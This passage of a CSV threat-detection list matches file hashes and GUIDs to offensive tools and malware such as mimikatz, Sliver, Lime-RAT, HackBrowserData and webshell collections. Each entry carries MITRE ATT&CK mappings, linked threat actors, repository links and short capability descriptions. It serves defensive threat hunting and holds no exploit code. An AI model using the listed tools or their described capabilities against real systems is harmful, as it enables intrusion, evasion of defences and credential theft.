- supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","24761" "*3891197c6740b1864b7a01b8d64b917fded55d40516b5e2774c92e92fc2ed5ef*",".{0,1000}3891197c6740b1864b7a01b8d64b917fded55d40516b5e2774c92e92fc2ed5ef.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","24762" "*3891b5f4e423fe98717c69231f6f5ba1db16b1997858f3ecdf1e395bb9640a84*",".{0,1000}3891b5f4e423fe98717c69231f6f5ba1db16b1997858f3ecdf1e395bb9640a84.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","24763" "*3897adf59fea097e79c69c0c4fa8961b9691232f382a52b7bee3ce234028da4e*",".{0,1000}3897adf59fea097e79c69c0c4fa8961b9691232f382a52b7bee3ce234028da4e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24766" "*38a0bf28c523180015d3c969129a72e94bbbcdb4dc30f9a630b32f6c97c41e0d*",".{0,1000}38a0bf28c523180015d3c969129a72e94bbbcdb4dc30f9a630b32f6c97c41e0d.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","24767" "*38a838f0558351bea32e58dd7f5bafe47a66c54c14f2be2cbf1631109377257f*",".{0,1000}38a838f0558351bea32e58dd7f5bafe47a66c54c14f2be2cbf1631109377257f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24769" "*38AF011B-95F8-4F42-B4B9-B1AEE328A583*",".{0,1000}38AF011B\-95F8\-4F42\-B4B9\-B1AEE328A583.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","#GUIDproject","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","24772" "*38b56d8415cbf78361f7748a637162c03d430f698862f6a3d4a1d7b450971053*",".{0,1000}38b56d8415cbf78361f7748a637162c03d430f698862f6a3d4a1d7b450971053.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24774" "*38bbfb8a6e3de5fb329505605290d408b8d99be65f351daf4b015773525a20e3*",".{0,1000}38bbfb8a6e3de5fb329505605290d408b8d99be65f351daf4b015773525a20e3.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24776" 
"*38bd23d1d1f4ebf370687153ac82cf815d811d46f28bdf2259a8c59e9f3553f1*",".{0,1000}38bd23d1d1f4ebf370687153ac82cf815d811d46f28bdf2259a8c59e9f3553f1.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","24777" "*38beeacf86dd8936b862c650818a65a0386a4cbd927c8191e84f9b8c8322a09d*",".{0,1000}38beeacf86dd8936b862c650818a65a0386a4cbd927c8191e84f9b8c8322a09d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24778" "*38d05edbbe5d0667278b55dbf9c53493153e8416e4694c97d92f06f429690dc0*",".{0,1000}38d05edbbe5d0667278b55dbf9c53493153e8416e4694c97d92f06f429690dc0.{0,1000}","offensive_tool_keyword","Dispossessor","socks tools used by the ransomware group Dispossessor","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","24783" "*38d181fa41f6cf0a8125620801d745db9f0d479e2ecc130cd136e9190b9de52d*",".{0,1000}38d181fa41f6cf0a8125620801d745db9f0d479e2ecc130cd136e9190b9de52d.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","24784" 
"*38ea755e162c55ef70f9506dddfd01641fc838926af9c43eda652da63c67058b*",".{0,1000}38ea755e162c55ef70f9506dddfd01641fc838926af9c43eda652da63c67058b.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","24786" "*38f4134e67348c6eb804f52463d9b3716ffa93ead0db4aa21ff9231bc91fc52a*",".{0,1000}38f4134e67348c6eb804f52463d9b3716ffa93ead0db4aa21ff9231bc91fc52a.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","#filehash","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","24787" "*3900ecdf76a186de3454e3f2dd45b338cc46cd855e2a027160f3cf6a25385482*",".{0,1000}3900ecdf76a186de3454e3f2dd45b338cc46cd855e2a027160f3cf6a25385482.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","24788" "*3906359d473ef56efef773c5bcbd0c8f8df1b3f18e90fc0d0c8f4c2112706ea9*",".{0,1000}3906359d473ef56efef773c5bcbd0c8f8df1b3f18e90fc0d0c8f4c2112706ea9.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","24790" "*390b859b5bb058c09998a5eb532d819b4977924c81a2f3ddd4f36c4b9d26f2bf*",".{0,1000}390b859b5bb058c09998a5eb532d819b4977924c81a2f3ddd4f36c4b9d26f2bf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24791" "*3911d52883ec32df91fde022f08e4acf0ee9d4d52990b36cb603da6bde167f32*",".{0,1000}3911d52883ec32df91fde022f08e4acf0ee9d4d52990b36cb603da6bde167f32.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24793" "*391d4825efd725d2deed4dd7d2addc62f38c3c8f15e84ada070aabc2303b4ab4*",".{0,1000}391d4825efd725d2deed4dd7d2addc62f38c3c8f15e84ada070aabc2303b4ab4.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black 
Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","24795" "*39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6*",".{0,1000}39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24797" "*39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6*",".{0,1000}39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24798" "*39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6*",".{0,1000}39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24799" "*39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6*",".{0,1000}39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered 
Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24800" "*39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6*",".{0,1000}39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24801" "*39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6*",".{0,1000}39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24802" "*39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6*",".{0,1000}39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24803" "*39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6*",".{0,1000}39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts 
suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24804" "*39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6*",".{0,1000}39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24805" "*3922246663d030813506516c147f8281d8c81f1cdc1153238643f580b52093d7*",".{0,1000}3922246663d030813506516c147f8281d8c81f1cdc1153238643f580b52093d7.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","0","#filehash","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","24806" "*3929a5cf7450e6cd0efada336cf89f7a188f0d40e7f4a7a2bff91fd7a30c48b3*",".{0,1000}3929a5cf7450e6cd0efada336cf89f7a188f0d40e7f4a7a2bff91fd7a30c48b3.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz compiled hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt 
Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","https://www.virustotal.com/gui/file/3929a5cf7450e6cd0efada336cf89f7a188f0d40e7f4a7a2bff91fd7a30c48b3/details","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24807" "*3930e87199b44252705c1114f728e3ca38e6439a7279ef8d7fd33fa9869b9b43*",".{0,1000}3930e87199b44252705c1114f728e3ca38e6439a7279ef8d7fd33fa9869b9b43.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","24808" "*393bbcf5be1871ceb753e35e87e904349d6a55fef87d0f1ace01b859967365dc*",".{0,1000}393bbcf5be1871ceb753e35e87e904349d6a55fef87d0f1ace01b859967365dc.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24809" "*394829a9b5326aecbe637fbbac5da01ea7f74355a512dda4f865a58869cf16e0*",".{0,1000}394829a9b5326aecbe637fbbac5da01ea7f74355a512dda4f865a58869cf16e0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24812" "*394cd66a9040e0c75a2faa3f9108029689df136927665573bf4a457f58c9a798*",".{0,1000}394cd66a9040e0c75a2faa3f9108029689df136927665573bf4a457f58c9a798.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24814" "*394d1e6fe47e5958c6cd1ea8a053b100d231c72cabd11f044f51007ef60f2ed4*",".{0,1000}394d1e6fe47e5958c6cd1ea8a053b100d231c72cabd11f044f51007ef60f2ed4.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","24815" "*3951c1b03367cc1dc4de8290ec9507dad9f239a53b815f09691dea5a78c00901*",".{0,1000}3951c1b03367cc1dc4de8290ec9507dad9f239a53b815f09691dea5a78c00901.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24817" "*39537a85f0b719915f068289d3e6da72899861afcdb3ca5d7a78de505629ac8d*",".{0,1000}39537a85f0b719915f068289d3e6da72899861afcdb3ca5d7a78de505629ac8d.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","24818" "*395408bc1ac0cbe250b3131c09592f7ac490a77a2625ce2f213480a96fcc8bd4*",".{0,1000}395408bc1ac0cbe250b3131c09592f7ac490a77a2625ce2f213480a96fcc8bd4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24819" "*39556e3779ee1fc2a06c32eff48acd03a01aa0b59bac075ad1457b65a14b3911*",".{0,1000}39556e3779ee1fc2a06c32eff48acd03a01aa0b59bac075ad1457b65a14b3911.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - 
T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#filehash","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","24820" "*3955964e71c4cb56d759d128097b15278c07c9ba0fb280958fe42a36ea84baad*",".{0,1000}3955964e71c4cb56d759d128097b15278c07c9ba0fb280958fe42a36ea84baad.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24821" "*395cb1f243d7c705459a5c7c931b48617a39ca9e89b04f4c9759f25364cfe371*",".{0,1000}395cb1f243d7c705459a5c7c931b48617a39ca9e89b04f4c9759f25364cfe371.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","24823" "*395d96a331abff7678ff53367fc4cc533be001125533a989688c17476d0f0125*",".{0,1000}395d96a331abff7678ff53367fc4cc533be001125533a989688c17476d0f0125.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24824" "*39666b5eecc134e2d6c22ef6233faee7f8556383c82368b98d85ff106931f751*",".{0,1000}39666b5eecc134e2d6c22ef6233faee7f8556383c82368b98d85ff106931f751.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24827" "*396febb7796a5a3ba0250af4700e9fa21240a83c4ebc2a744da0c2f028ca396c*",".{0,1000}396febb7796a5a3ba0250af4700e9fa21240a83c4ebc2a744da0c2f028ca396c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","24828" 